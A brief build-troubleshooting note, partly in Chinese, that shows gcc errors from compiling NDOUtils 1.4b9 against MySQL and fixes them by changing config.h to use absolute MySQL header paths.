gcc -fPIC -g -O2 -I/usr/local/mysql/include/mysql -DHAVE_CONFIG_H -c -o io.o io.c
In file included from io.c:11:
../include/config.h:261:25: error: mysql/mysql.h: No such file or directory
../include/config.h:262:26: error: mysql/errmsg.h: No such file or directory
make[1]: *** [io.o] Error 1
make[1]: Leaving directory `/root/nagiosddd/ndoutils-1.4b9/src’
make: *** [all] Error 2
解决方法
# vi include/config.h
将
#include <mysql/mysql.h>
#include <mysql/errmsg.h>
修改为
#include </usr/local/mysql/include/mysql/mysql.h>
#include </usr/local/mysql/include/mysql/errmsg.h>